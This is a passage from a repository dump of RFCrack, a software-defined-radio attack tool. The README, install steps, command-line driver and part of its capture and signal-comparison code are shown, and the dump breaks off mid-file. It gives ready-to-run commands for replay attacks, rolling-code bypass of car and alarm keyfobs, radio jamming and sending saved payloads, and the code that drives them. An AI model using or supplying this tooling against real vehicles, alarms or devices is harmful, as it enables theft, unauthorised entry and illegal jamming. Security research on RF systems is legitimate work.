├── INSTALL
├── LICENSE
├── README
├── RFCrack.py
├── captures
    └── capturedClicks.log
├── device_templates
    └── doorbell.config
├── imageOutput
    ├── Graph1.png
    └── LiveComparison.png
├── scanning_logs
    └── Jan28_15:58:20.log
└── src
    ├── Clicker.py
    ├── RFFunctions.py
    ├── RFSettings.py
    ├── __init__.py
    ├── attacks.py
    ├── findDevices.py
    ├── jam.py
    └── utilities.py


/INSTALL:
--------------------------------------------------------------------------------
 1 | #Option 1 (Via Venv mostly, had some issues)
 2 | #This should work if you want to use ENV, though gave me issues in Kali where I had to use Root Env: 
 3 | #-----------------------------------------------------------------------------------------------------#
 4 | sudo apt install python3-pip
 5 | sudo apt install python3-virtualenv
 6 | sudo apt-get install eog
 7 | 
 8 | python3 -m venv env
 9 | source env/bin/activate
10 | 
11 | pip Install rfcat
12 | pip install matplotlib
13 | pip install bitstring
14 | pip install libusb
15 | pip install pyusb
16 | 
17 | rfcat -r
18 | 
19 | 
20 | 
21 | 
22 | #Option 2 (Prefered for me) 
23 | #Optionally I recently set it up with Apt mostly in Kali I had to do this to avoid Root Usage: 
24 | #---------------------------------------------------------------------------------------------
25 | sudo apt install python3-bitstring
26 | sudo apt install python3-matplotlib
27 | sudo apt-get install python libusb-1.0-0
28 | sudo apt install python3-pyusb
29 | sudo apt install python3-numpy
30 | sudo apt-get install eog
31 | sudo apt install rfcat
32 | 
33 | rfcat -r
34 | 
35 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | 
 2 | Copyright (c) 2024 Olie Brown
 3 | 
 4 | Permission is hereby granted free of charge for individual personal use only.
 5 | Permission is prohibited for other purposes, for example but not limited to,
 6 | other projects, commercial use and sales by anyone other then the original author
 7 | of RFCrack without express permission of the aforementioned RFCrack author.
 8 | 
 9 | 
10 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
11 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
12 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
13 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
14 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
15 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
16 | SOFTWARE.
17 | 


--------------------------------------------------------------------------------
/README:
--------------------------------------------------------------------------------
  1 | 
  2 |    ___                  _        ___            _
  3 |   / __|___ _ _  ___ ___| |___   / __|_____ __ _| |__  ___ _  _ ___
  4 |  | (__/ _ \ ' \(_-</ _ \ / -_) | (__/ _ \ V  V / '_ \/ _ \ || (_-<
  5 |   \___\___/_||_/__/\___/_\___|  \___\___/\_/\_/|_.__/\___/\_, /__/
  6 |                                                           |__/
  7 |             ___ ___ ___             _
  8 |       ___  | _ \ __/ __|_ _ __ _ __| |__
  9 |      |___| |   / _| (__| '_/ _` / _| / /
 10 |            |_|_\_| \___|_| \__,_\__|_\_\
 11 | 
 12 | 
 13 |     Welcome to RFCrack - A Software Defined Radio Attack Tool
 14 | 
 15 |     Developer: @Ficti0n - http://ConsoleCowboys.com
 16 |     CCLabs: http://cclabs.io
 17 |     Blog: console-cowboys.blogspot.com
 18 |     Release Tutorial: https://www.youtube.com/watch?v=H7-g15YZBiI
 19 |     Reversing Signals With RFCrack: https://www.youtube.com/watch?v=XqKoVFyOst0
 20 |     Release: 1.6 - Error Handling and Bug Fixes for Py3 and Bruijn generation code + updated Jamming Method
 21 | 
 22 | 
 23 |     Hardware Needed: (1 Yardstick or 2 for RollingCode)
 24 |     YardStick: https://goo.gl/wd88sr
 25 | 
 26 |     RFCrack is my personal RF test bench, it was developed for testing RF communications
 27 |     between any physical device that communicates over sub Ghz frequencies. IoT devices,
 28 |     Cars, Alarm Systems etc... Testing was done with the Yardstick One on OSX, but
 29 |     RFCrack should work fine in linux. Support for other RF related testing will be
 30 |     added as needed in my testing. I am currently researching keyless Entry bypasses and
 31 |     other signal analysis functionality. New functionality will be added in the future with
 32 |     additional hardware requirements for some advanced attacks.
 33 | 
 34 |     Feel free to use this software as is for personal use only. Do not use this code
 35 |     in other projects or in commercial products. I hold no liability for your actions
 36 |     with this code. Your life choices are your own.
 37 | 
 38 | 
 39 |     Current supported Functionality:
 40 |     ---------------------------------
 41 |     - Replay attacks -i -F
 42 |     - Send Saved Payloads -s -u
 43 |     - Rolling code bypass attacks -r -F -M
 44 |     - Targeted -t -F
 45 |     - Jamming -j -F
 46 |     - Scanning incrementally through frequencies -b -v -F
 47 |     - Scanning common frequencies -k
 48 |     - Compare Live incoming signals to previous signal -k -c -f -u
 49 |     - Graph Signal -n -g -u
 50 | 
 51 | 
 52 |     Usage Examples / Attacks:
 53 |     -------------------------
 54 |     Live Replay:         python RFCrack.py -i
 55 |     Rolling Code:        python RFCrack.py -r -M MOD_2FSK -F 314350000
 56 |     Adjust RSSI Values:  python RFCrack.py -r -M MOD_2FSK -F 314350000 -U -100 -L -10
 57 |     Jamming:             python RFCrack.py -j -F 314000000
 58 |     Scan common freq:    python RFCrack.py -k
 59 |     Scan with your list: python RFCrack.py -k -f 433000000 314000000 390000000
 60 |     Incremental Scan:    python RFCrack.py -b -v 5000000
 61 |     Send Saved Payload:  python RFCrack.py -s -u ./captures/test.cap -F 315000000 -M MOD_ASK_OOK
 62 |     With Loaded Config:  python RFCrack.py -l ./device_templates/doorbell.config -r
 63 |     Graph a Signal:      python RFCrack.py -n -g -u 1f0fffe0fffc01ff803ff007fe0fffc1fff83fff07
 64 | 
 65 |     Live Signal Identification and Comparison (Use 2 Console Windows):
 66 |     -----------------------------------------------------------------
 67 |     Setup sniffer:      python RFCrack.py -k -c -f 390000000
 68 |     Setup Analysis:     python RFCrack.py -c -u 1f0fffe0fffc01ff803ff007fe0fffc1fff83fff07f -n
 69 | 
 70 | 
 71 |     Useful arguments:
 72 |     ------------------------
 73 |     -M Change modulation, usually MOD_2FSK or MOD_ASK_OOK
 74 |     -F Change the frequency used in attacks
 75 |     -U upper_rssi signal strength value for rolling Code
 76 |     -L lower.rssi signal strength value for rolling code
 77 |     -S Change Channel Spacing
 78 |     -V Change Deviation of modulation
 79 |     -a Jamming frequency variance from sniffer
 80 |     -s Send packet from a file source
 81 |     -d Save your current device settings into a loadable template after attack completes
 82 |     -l Load previously saved device configuration with attack
 83 |     -n Your using functionality that does not require a yardstick plugged in
 84 |     -u Use saved data in your attack
 85 | 
 86 |     Directories Explained:
 87 |     ----------------------
 88 |     Saved captures get saved to ./captures directory by default!
 89 |     Live signal identification captures also saved to ./captures directory in capturedClicks.log
 90 |     Device templates are saved and loaded to ./device_templates by default
 91 |     Scanning logs are saved to ./scanning_logs named based on date and time of scanning start
 92 |     Graph comparison images are saved to imageOutput in 2 formats
 93 |      - Live: LiveComparison.png will just be written over on each signal Analysis
 94 |      - Log analysis: Comparison1 Comparison2 format is used and written over on each log analysis
 95 | 
 96 |     Other Notes:
 97 |     ------------------------
 98 |     Understand that Rolling code is hit or miss due to its nature with jamming and sniffing
 99 |     at the same time, but it works. Just use the keyfob near the yardsticks as if you were
100 |     stalking your target. It will also require 2 yardsticks, one for sniffing while the other
101 |     one is jamming. Yardsticks do not send and receive at the same time.
102 | 
103 |     And a final note, this is my own test bench for doing research and dev, if you have ideas
104 |     to make RFCrack better based on realistic use case scenarios, feel free to reach out to me If
105 |     the ideas are realistic, well thought out, and re-useable use cases I will implement them.
106 | 


--------------------------------------------------------------------------------
/RFCrack.py:
--------------------------------------------------------------------------------
  1 | from rflib import *
  2 | import src.RFFunctions as tools
  3 | import re, time, argparse, textwrap
  4 | import src.jam as jam
  5 | import src.findDevices as findDevices
  6 | import src.attacks as attacks
  7 | import src.RFSettings as RFSettings
  8 | import src.utilities as utilities
  9 | import src.Clicker as Clicker
 10 | import sys
 11 | 
 12 | sys.dont_write_bytecode = True
 13 | parser = argparse.ArgumentParser(add_help=True, formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(r'''
 14 | 
 15 |    ___                  _        ___            _
 16 |   / __|___ _ _  ___ ___| |___   / __|_____ __ _| |__  ___ _  _ ___
 17 |  | (__/ _ \ ' \(_-</ _ \ / -_) | (__/ _ \ V  V / '_ \/ _ \ || (_-<
 18 |   \___\___/_||_/__/\___/_\___|  \___\___/\_/\_/|_.__/\___/\_, /__/
 19 |                                                           |__/
 20 |             ___ ___ ___             _
 21 |       ___  | _ \ __/ __|_ _ __ _ __| |__
 22 |      |___| |   / _| (__| '_/ _` / _| / /
 23 |            |_|_\_| \___|_| \__,_\__|_\_\
 24 | 
 25 | 
 26 |     Welcome to RFCrack - A Software Defined Radio Attack Tool
 27 | 
 28 |     Developer: @Ficti0n - http://ConsoleCowboys.com
 29 |     CCLabs: http://cclabs.io
 30 |     Blog: console-cowboys.blogspot.com
 31 |     Release Tutorial: https://www.youtube.com/watch?v=H7-g15YZBiI
 32 |     Reversing Signals With RFCrack: https://www.youtube.com/watch?v=XqKoVFyOst0
 33 |     Release: 1.6 - Error Handling and Bug Fixes for Py3 and Bruijn generation code + updated Jamming Method
 34 | 
 35 |     Hardware Needed: (1 Yardstick or 2 for RollingCode)
 36 |     YardStick: https://goo.gl/wd88sr
 37 | 
 38 |     RFCrack is my personal RF test bench, it was developed for testing RF communications
 39 |     between any physical device that communicates over sub Ghz frequencies. IoT devices,
 40 |     Cars, Alarm Systems etc... Testing was done with the Yardstick One on OSX, but
 41 |     RFCrack should work fine in linux. Support for other RF related testing will be
 42 |     added as needed in my testing. I am currently researching keyless Entry bypasses and
 43 |     other signal analysis functionality. New functionality will be added in the future with
 44 |     additional hardware requirements for some advanced attacks.
 45 | 
 46 |     Feel free to use this software as is for personal use only. Do not use this code
 47 |     in other projects or in commercial products. I hold no liability for your actions
 48 |     with this code. Your life choices are your own.
 49 | 
 50 | 
 51 |     Current supported Functionality:
 52 |     ---------------------------------
 53 |     - Replay attacks -i -F
 54 |     - Send Saved Payloads -s -u
 55 |     - Rolling code bypass attacks -r -F -M
 56 |     - Targeted -t -F
 57 |     - Jamming -j -F
 58 |     - Scanning incrementally through frequencies -b -v -F
 59 |     - Scanning common frequencies -k
 60 |     - Compare Live incoming signals to previous signal -k -c -f -u
 61 |     - Graph Signal -n -g -u
 62 | 
 63 | 
 64 |     Usage Examples / Attacks:
 65 |     -------------------------
 66 |     Live Replay:         python RFCrack.py -i
 67 |     Rolling Code:        python RFCrack.py -r -M MOD_2FSK -F 314350000
 68 |     Adjust RSSI Values:  python RFCrack.py -r -M MOD_2FSK -F 314350000 -U -100 -L -10
 69 |     Jamming:             python RFCrack.py -j -F 314000000
 70 |     Scan common freq:    python RFCrack.py -k
 71 |     Scan with your list: python RFCrack.py -k -f 433000000 314000000 390000000
 72 |     Incremental Scan:    python RFCrack.py -b -v 5000000
 73 |     Send Saved Payload:  python RFCrack.py -s -u ./captures/test.cap -F 315000000 -M MOD_ASK_OOK
 74 |     With Loaded Config:  python RFCrack.py -l ./device_templates/doorbell.config -r
 75 |     Graph a Signal:      python RFCrack.py -n -g -u 1f0fffe0fffc01ff803ff007fe0fffc1fff83fff07
 76 | 
 77 |     Live Signal Identification and Comparison (Use 2 Console Windows):
 78 |     -----------------------------------------------------------------
 79 |     Setup sniffer:      python RFCrack.py -k -c -f 390000000
 80 |     Setup Analysis:     python RFCrack.py -c -u 1f0fffe0fffc01ff803ff007fe0fffc1fff83fff07f -n
 81 | 
 82 |     Useful arguments:
 83 |     ------------------------
 84 |     -M Change modulation, usually MOD_2FSK or MOD_ASK_OOK
 85 |     -F Change the frequency used in attacks
 86 |     -U upper_rssi signal strength value for rolling Code
 87 |     -L lower.rssi signal strength value for rolling code
 88 |     -S Change Channel Spacing
 89 |     -V Change Deviation of modulation
 90 |     -a Jamming frequency variance from sniffer
 91 |     -s Send packet from a file source
 92 |     -d Save your current device settings into a loadable template
 93 |     -l Load previously saved device configuration with attack
 94 |     -n Your using functionality that does not require a yardstick plugged in
 95 |     -u Use saved data in your attack
 96 | 
 97 |     Directories Explained:
 98 |     ----------------------
 99 |     Saved captures get saved to ./captures directory by default!
100 |     Live signal identification captures also saved to ./captures directory in capturedClicks.log
101 |     Device templates are saved and loaded to ./device_templates by default
102 |     Scanning logs are saved to ./scanning_logs named based on date and time of scanning start
103 |     Graph comparison images are saved to imageOutput in 2 formats
104 |      - Live: LiveComparison.png will just be written over on each signal Analysis
105 |      - Log analysis: Comparison1 Comparison2 format is used and written over on each log analysis
106 | 
107 |     Other Notes:
108 |     ------------------------
109 |     Understand that Rolling code is hit or miss due to its nature with jamming and sniffing at the same time,
110 |     but it works. Just use the keyfob near the yardsticks as if you were stalking your target.
111 |     It will also require 2 yardsticks, one for sniffing while the other one is jamming. Yardsticks do not
112 |     send and receive at the same time.
113 | 
114 |     And a final note, this is my own test bench for doing research and dev, if you have ideas
115 |     to make RFCrack better based on realistic use case scenarios, feel free to reach out to me If
116 |     the ideas are realistic, well thought out, and re-useable use cases I will implement them.
117 | 
118 |        '''))
119 | 
120 | parser.add_argument("-s", "--send", action='store_true', help=argparse.SUPPRESS)
121 | parser.add_argument("-i", "--instant_replay", action='store_true', help=argparse.SUPPRESS)
122 | parser.add_argument("-r", "--rolling_code", default= False, action='store_true', help=argparse.SUPPRESS)
123 | parser.add_argument("-t", "--targeted_attack", help=argparse.SUPPRESS)
124 | parser.add_argument("-j", "--jammer", action='store_true', help=argparse.SUPPRESS)
125 | parser.add_argument("-b", "--brute_scanner",action='store_true', help=argparse.SUPPRESS)
126 | parser.add_argument("-k", "--known_scanner",action='store_true', help=argparse.SUPPRESS)
127 | parser.add_argument("-v", "--increment_value", help=argparse.SUPPRESS ,type=int)
128 | parser.add_argument('-u', "--uploaded_payload",  help=argparse.SUPPRESS)
129 | parser.add_argument('-f', "--list",nargs='+', type=int, default=[315000000, 433000000], help=argparse.SUPPRESS)
130 | parser.add_argument('-a', "--jamming_variance", default=80000, help=argparse.SUPPRESS, type=int)
131 | parser.add_argument('-d', "--save_device_settings",action='store_true', help=argparse.SUPPRESS)
132 | parser.add_argument('-l', "--load_device_settings", help=argparse.SUPPRESS)
133 | parser.add_argument('-c', "--compare",action='store_true', help=argparse.SUPPRESS)
134 | parser.add_argument('-n', "--no_instance",action='store_true', help=argparse.SUPPRESS)
135 | parser.add_argument('-g', "--graph_signal",action='store_true', help=argparse.SUPPRESS)
136 | parser.add_argument('-D', "--de_bruijn",action='store_true', help=argparse.SUPPRESS)
137 | parser.add_argument('-B', "--baud_rate", default=4800, help=argparse.SUPPRESS, type=int)
138 | parser.add_argument('-U', "--upper_rssi", default=-100, help=argparse.SUPPRESS, type=int)
139 | parser.add_argument('-L', "--lower_rssi", default=-20, help=argparse.SUPPRESS, type=int)
140 | parser.add_argument("-F", "--frequency",default=315000000, help=argparse.SUPPRESS, type=int)
141 | parser.add_argument('-C', "--channel_bandwidth", default=60000, help=argparse.SUPPRESS, type=int)
142 | parser.add_argument("-M", "--modulation_type",default="MOD_ASK_OOK", help=argparse.SUPPRESS)
143 | parser.add_argument("-S", "--channel_spacing",default=24000, help=argparse.SUPPRESS,type=int)
144 | parser.add_argument("-V", "--deviation", default=0, help=argparse.SUPPRESS,type=int)
145 | 
146 | 
147 | args = parser.parse_args()
148 | 
149 | num_provided_args = utilities.count_provided_args(args, parser)
150 | 
151 | if num_provided_args == 0:
152 |     parser.print_help()
153 |     sys.exit(1)
154 | 
155 | rf_settings = RFSettings.RFSettings(args.frequency,
156 |                                     args.baud_rate,
157 |                                     args.channel_bandwidth,
158 |                                     args.modulation_type,
159 |                                     args.upper_rssi,
160 |                                     args.lower_rssi,
161 |                                     args.channel_spacing,
162 |                                     args.deviation)
163 | if (args.load_device_settings != None):
164 |     with open(args.load_device_settings) as f:
165 |         file_data = f.readlines()
166 |         rf_settings.loadDeviceSettingsTemplate(file_data)
167 | 
168 | if not args.jammer and not args.no_instance:
169 |     try:
170 |         d = RfCat(idx=0)
171 |     except Exception as e:
172 |         print("Yardstick not plugged in or not detected, exiting...")
173 |         sys.exit(0)
174 |     d.setFreq(int(rf_settings.frequency))
175 |     d.setMdmDRate(rf_settings.baud_rate)
176 |     d.setMaxPower()
177 |     d.setMdmChanSpc(rf_settings.channel_spacing)
178 |     d.setMdmChanBW(rf_settings.channel_bandwidth)
179 |     d.setMdmSyncMode(0)
180 |     d.setChannel(0)
181 |     d.lowball(1)
182 |     if (rf_settings.deviation != 0):
183 |         d.setMdmDeviatn(rf_settings.deviation)
184 |     if (rf_settings.modulation_type == "MOD_ASK_OOK"):
185 |         d.setMdmModulation(MOD_ASK_OOK)
186 |     elif (rf_settings.modulation_type == "MOD_2FSK"):
187 |         d.setMdmModulation(MOD_2FSK)
188 | 
189 | 
190 | if args.rolling_code:
191 |     print("Don't forget to change the default frequency and modulation type")
192 |     attacks.rollingCode(d, rf_settings, args.rolling_code, args.jamming_variance)
193 | 
194 | if args.known_scanner and not args.compare:
195 |     print("For a custom list use the -z option in the format -f 433000000 314000000 390000000")
196 |     findDevices.searchKnownFreqs(d, args.list)
197 | 
198 | if args.brute_scanner:
199 |     if args.increment_value == None:
200 |         print("Bruteforcing requires -v argument for an incrementing inteval value Example: 500000")
201 |     else:
202 |         findDevices.bruteForceFreq(d, rf_settings, args.increment_value)
203 | 
204 | if args.jammer:
205 |     j = jam.setupJammer(0, rf_settings)
206 |     jam.jamming(j, "start", rf_settings, args.rolling_code)
207 | 
208 | if args.instant_replay:
209 |     attacks.replayLiveCapture(d, args.rolling_code, rf_settings)
210 | 
211 | if args.send:
212 |     if args.uploaded_payload == None:
213 |         print("Send requires -u argument for an upload file path  Example: ./captures/payload.cap")
214 |     else:
215 |         attacks.replaySavedCapture(d, args.uploaded_payload)
216 | 
217 | if args.save_device_settings:
218 |     device_name = input( "What would you like to name the device template: ")
219 |     rf_settings.saveDeviceSettingsTemplate(rf_settings, device_name)
220 | 
221 | if args.known_scanner and args.compare:
222 |     print("Uses lowercase f parameter to specify a single value Frequency list")
223 |     findDevices.searchKnownFreqs(d, args.list, args.compare)
224 | 
225 | if args.compare and args.uploaded_payload is not None:
226 |     my_clicker = Clicker.Clicker(args.uploaded_payload)
227 |     utilities.logTail(my_clicker)
228 | 
229 | if args.graph_signal and args.uploaded_payload is not None:
230 |     my_clicker = Clicker.Clicker(args.uploaded_payload)
231 |     captured_payload_binary = my_clicker.payloadsToBinary(my_clicker.captured_payload)
232 |     my_clicker.createGraph(captured_payload_binary, 0)
233 |     my_clicker.outputImagesComparisons(1)
234 |     my_clicker.openImage('./imageOutput/Graph1.png')
235 | 
236 | if args.de_bruijn:
237 |     if args.uploaded_payload is None:
238 |         print("De Bruijn sequence generation requires -u argument for the alphabet and length. Example: -u 01 3")
239 |         print("Executing Attack instead")
240 |         attacks.deBruijn(d)
241 |     else:
242 |         alphabet, length = args.uploaded_payload.split()
243 |         sequence = utilities.generate_de_bruijn_sequence(alphabet, int(length))
244 |         print(f"Generated de Bruijn sequence: {sequence}")
245 | 
246 | 


--------------------------------------------------------------------------------
/captures/capturedClicks.log:
--------------------------------------------------------------------------------
1 | Leave This file here.. It grabs the newest lines for Analysis during testing.
2 | 


--------------------------------------------------------------------------------
/device_templates/doorbell.config:
--------------------------------------------------------------------------------
1 | deviation:0
2 | lower_rssi:-20
3 | upper_rssi:-100
4 | baud_rate:4800
5 | frequency:315000000
6 | channel_bandwidth:60000
7 | channel_spacing:24000
8 | modulation_type:MOD_ASK_OOK
9 | 


--------------------------------------------------------------------------------
/imageOutput/Graph1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cclabsInc/RFCrack/db73830d11c0e3b547366c38fb9693aa8692fc10/imageOutput/Graph1.png


--------------------------------------------------------------------------------
/imageOutput/LiveComparison.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cclabsInc/RFCrack/db73830d11c0e3b547366c38fb9693aa8692fc10/imageOutput/LiveComparison.png


--------------------------------------------------------------------------------
/scanning_logs/Jan28_15:58:20.log:
--------------------------------------------------------------------------------
1 | A signal was found on :315000000
2 | c0c000c0c0c0c0c0c0bde318c6f7bc00000000000000de31bde318c6f7bc00000000000000de31bde318c6f7bc00000000000000de31bde318c6f7bc00000000000000de31bde318c6f7bc00000000000000de31bde318c6f7bc00000000000000de31bde318c6f7bc00000000000000de31bde318c2739c000000000000004e109ce10842739c000000000000004e109ce10842739c000000000000004e109ce10842739c000000000000004e109ce10842739c000000000000004e109ce10842739c000000000000004e109ce10842739c00000000000000ce109ce10842739c00000000000000de109ce10842739c00000000000000de109c
3 | A signal was found on :315000000
4 | bc637bc6318def7800000000000001bc637bc6318de738000000000039c21084e73800000000000001bc2139c21084e738000000000000019c2139c21084e738000000000000009c2139c21084e738000000000000009c2139c21084e738000000000000009c2139c21084e738000000000000019c2139c21084e738000000000000019c2139c21084e738000000000000009c2139c21084e738000000000000019c2139c21084e738000000000000009c2139c21084e738000000000000019c2139c21084e738000000000000009c2139c21084e738000000000000009c2139c21084e738000000000000019c2139c21084e738000000000000
5 | 


--------------------------------------------------------------------------------
/src/Clicker.py:
--------------------------------------------------------------------------------
  1 | import matplotlib.pyplot as plt
  2 | import matplotlib.pylab as pylab
  3 | import numpy as np
  4 | import sys,subprocess
  5 | from . import RFFunctions as tools
  6 | sys.dont_write_bytecode = True
  7 | 
  8 | #----------Setup Graphing Size-----------#
  9 | fig_size = plt.rcParams["figure.figsize"]
 10 | fig_size[0] = 8
 11 | fig_size[1] = 3
 12 | plt.rcParams["figure.figsize"] = fig_size
 13 | #---------End Graphing Size Setup---------#
 14 | 
 15 | class Clicker():
 16 |     '''This class is used to help identify and analyse signals as well as create clickers
 17 |     from captures. It uses a known payload and live captures or a logfile of unknown payloads to compare'''
 18 |     def __init__(self, captured_payload, keyfob_payloads=[]):
 19 |         self.captured_payload = captured_payload
 20 |         self.keyfob_payloads = keyfob_payloads
 21 | 
 22 |     def determineDipSwitches(self, captured_payload):
 23 |         ''' This function will return the dip switches as up:down:down:up format based on signal analysis'''
 24 |         pass
 25 | 
 26 |     def liveClicks(self):
 27 |         '''Compare Signals and Create graphs to compare a live capture with a keyfob press'''
 28 |         count = 0
 29 |         live = True
 30 |         graphToPercent = {} #Holds % match and payload for each signal in a click
 31 | 
 32 |         #Get binary output of the payload
 33 |         captured_payload_binary  = self.payloadsToBinary(self.captured_payload)
 34 |         print("----------Start Signals In Press--------------")
 35 |         for presses in self.keyfob_payloads:
 36 |             for keyfob_payload in presses:
 37 |                 #Get binary output of the keyfob captures
 38 |                 keyfob_programming_binary = self.payloadsToBinary(keyfob_payload)
 39 | 
 40 |                 #Handle Calculations for likilihood
 41 |                 one = ''.join(str(x) for x in captured_payload_binary)
 42 |                 two =''.join(str(x) for x in keyfob_programming_binary)
 43 | 
 44 |                 percent = tools.similar(one,two)
 45 |                 graphToPercent[keyfob_payload] = percent
 46 | 
 47 |                 print(f"Percent Chance of Match for press is: {percent}")
 48 |         print("----------End Signals In Press------------")
 49 |         #Send dictionaries of percents and return the signal with the highest % comparison
 50 |         keyfob_payload = self.getHighestPercent(graphToPercent)
 51 |         keyfob_programming_binary = self.payloadsToBinary(keyfob_payload)
 52 | 
 53 |         self.createGraph(captured_payload_binary, keyfob_programming_binary)
 54 |         self.outputImagesComparisons(1, live)
 55 |         plt.close()
 56 |         self.openImage('./imageOutput/LiveComparison.png')
 57 | 
 58 |         print("For Visual of the last signal comparison go to ./imageOutput/LiveComparison.png")
 59 | 
 60 | 
 61 |     def createImageGraph(self):
 62 |         '''Create a graph to compare a list of captures with the keyfob press'''
 63 |         count = 0
 64 |         likilihoods = []
 65 |         #Get binary output of the payload
 66 |         captured_payload_binary  = self.payloadsToBinary(self.captured_payload)
 67 | 
 68 |         for presses in self.keyfob_payloads:
 69 |             for keyfob_payload in presses:
 70 |                 #Get binary output of the keyfob captures
 71 |                 keyfob_programming_binary = self.payloadsToBinary(keyfob_payload)
 72 | 
 73 |                 #Handle Calculations for likilihood
 74 |                 one = ''.join(str(x) for x in captured_payload_binary)
 75 |                 two =''.join(str(x) for x in keyfob_programming_binary)
 76 | 
 77 |                 percent = tools.similar(one,two)
 78 |                 print(f"Percent Chance of Match for press is: {percent}")
 79 | 
 80 |                 self.createGraph(captured_payload_binary, keyfob_programming_binary)
 81 |                 self.outputImagesComparisons(count)
 82 |                 count = count+1
 83 |                 plt.close()
 84 | 
 85 |     def setupNumberPrinting(self, captured_payload_binary, keyfob_programming_binary):
 86 |         '''prints numbers under the graph, reduces the counts in half for readability with a counter'''
 87 |         count = 0
 88 |         for tbit, bit in enumerate(captured_payload_binary):
 89 |             if (count % 2 != 1):
 90 |                 plt.text(tbit + 0.5, 3.5, str(bit))
 91 |             count = count +1
 92 |         count = 0
 93 |         for tbit, bit in enumerate(keyfob_programming_binary):
 94 |             if (count % 2 != 1):
 95 |                 plt.text(tbit + 0.5, 1.5, str(bit))
 96 |             count = count +1
 97 | 
 98 |     def outputImagesComparisons(self, count, live=False):
 99 |         '''Outputs image files to compare capture to keyfob presses'''
100 |         if live:
101 |             pylab.savefig("./imageOutput/LiveComparison.png")
102 |         else:
103 |             pylab.savefig("./imageOutput/Graph"+str(count)+".png")
104 | 
105 | 
106 |     def payloadsToBinary(self, payload):
107 |         '''Converts hex data into binary and back into lists of binary numbers'''
108 |         binary = bin(int(payload,16))[2:]
109 |         results = list(map(int, list(binary)))
110 |         return results
111 | 
112 |     def getHighestPercent(self, myDictionary):
113 |         ''' Takes a dictonary of signals as keys and returns the signal with the highest percent value'''
114 |         highest_percent = max(zip(myDictionary.values(), myDictionary.keys()))
115 |         return highest_percent[1]
116 | 
117 |     def openImage(self, path):
118 |         '''Opens and image from the hardrive based on the path sent in'''
119 |         imageViewerFromCommandLine = {'linux':'eog',
120 |                                       'linux2':'eog',
121 |                                       'win32':'explorer',    #doubt this works in windows but leaving it here for now
122 |                                       'darwin':'open'}[sys.platform]
123 |         subprocess.call([imageViewerFromCommandLine, path])
124 | 
125 |     def createGraph(self, captured_payload_binary, keyfob_programming_binary):
126 |         '''Sets up the graphing elements for images or display, requires 2 binary payloads to plot'''
127 |         payload_data = np.repeat(captured_payload_binary, 2)
128 |         keyfob_data = np.repeat(keyfob_programming_binary, 2)
129 |         t = 0.5 * np.arange(len(payload_data))
130 |         u = 0.5 * np.arange(len(keyfob_data))
131 | 
132 |         #Used to show the wave form
133 |         plt.step(t, payload_data + 4, 'r', linewidth = 2, where='post')
134 |         plt.step(u, keyfob_data + 2, 'r', linewidth = 2, where='post')
135 | 
136 |         #Limit the height of the waveform and turns off axis lines
137 |         plt.ylim([-1,6])
138 |         plt.gca().axis('off')
139 | 


--------------------------------------------------------------------------------
/src/RFFunctions.py:
--------------------------------------------------------------------------------
  1 | from rflib import *
  2 | import bitstring
  3 | import time, sys
  4 | sys.dont_write_bytecode = True
  5 | from difflib import SequenceMatcher
  6 | 
  7 | #-----------------Start RF Capture ----------------#
  8 | def capturePayload(d, rolling_code, rf_settings):
  9 |     '''Starts a listener and returns a RFrecv capture of your choice and signal strength
 10 |     If there is rolling code options sent it will check for valid packets while jammer is running'''
 11 | 
 12 | 
 13 |     capture = ""        #Capture without Rolling code
 14 |     roll_captures = []  #List of captures for RollingCode
 15 | 
 16 |     roll_count = 0      #used to count 2 captures
 17 |     while True:
 18 |         try:
 19 |             y, z = d.RFrecv()
 20 |             capture = y.hex()
 21 |             try:
 22 |                 signal_strength = 0 - int.from_bytes(d.getRSSI(), byteorder='big')
 23 |             except:
 24 |                 signal_strength = 0
 25 |         except ChipconUsbTimeoutException:
 26 |             pass
 27 | 
 28 |         #This block is used for rolling code things
 29 |         if rolling_code and capture:           #If there is a good capture and we are attacking rollingCode execute this block
 30 |             print(f"SIGNAL STRENGTH: {str(signal_strength)}")
 31 |             print(f"RF CAPTURE: \n {capture} \n")
 32 |             decision = determineRealTransmission(signal_strength, rf_settings)
 33 |             if decision:
 34 |                 roll_captures.append(capture)  #add key with good decision to the list
 35 |                 if roll_count >= 1:            #Check if we have 2 keys and return.
 36 |                     return roll_captures, signal_strength
 37 |                 else:
 38 |                     roll_count +=1
 39 |                     continue
 40 |             else:
 41 |                 continue
 42 | 
 43 |         #This block is when just capturing and returning, no rolling code
 44 |         elif capture and not rolling_code:
 45 |             print(f"SIGNAL STRENGTH: {str(signal_strength)}")
 46 |             print(f"RF CAPTURE: \n {capture} \n")
 47 |             try:
 48 |                 response = input("Do you want to return the above payload? (y/n)")
 49 |                 if response.lower() == 'y':
 50 |                     break
 51 |                 elif response.lower() == 'n':
 52 |                     capture =""
 53 |                 else:
 54 |                     print("You did not enter a valid response of y or n capture not saved")
 55 |                     capture = ""
 56 |                     
 57 |             except Exception as e:
 58 |                 print(f"Error during input: {e}")
 59 |                 capture = ""            
 60 | 
 61 |     return capture, signal_strength
 62 | 
 63 | 
 64 | #----------------- Determine Real Transmission ----------------#
 65 | def determineRealTransmission(signal_strength, rf_settings):
 66 |     ''' Used to search for transmissions which are not max power and fall between
 67 |     defined RSSI power levels'''
 68 |     if signal_strength > rf_settings.upper_rssi and signal_strength < rf_settings.lower_rssi:
 69 |         return True
 70 |     return False
 71 | 
 72 | #------------Split Captures by 4 or more 0's --------------------#
 73 | def splitCaptureByZeros(capture):
 74 |     '''Parse Hex from the capture by reducing 0's '''
 75 | 
 76 |     payloads = re.split('0000*', capture)
 77 |     items = []
 78 |     for payload in payloads:
 79 | 
 80 |         if len(payload) > 5:
 81 |             items.append(payload)
 82 | 
 83 |     return items
 84 | 
 85 | 
 86 | #------------Split Device Settings Configuration --------------------#
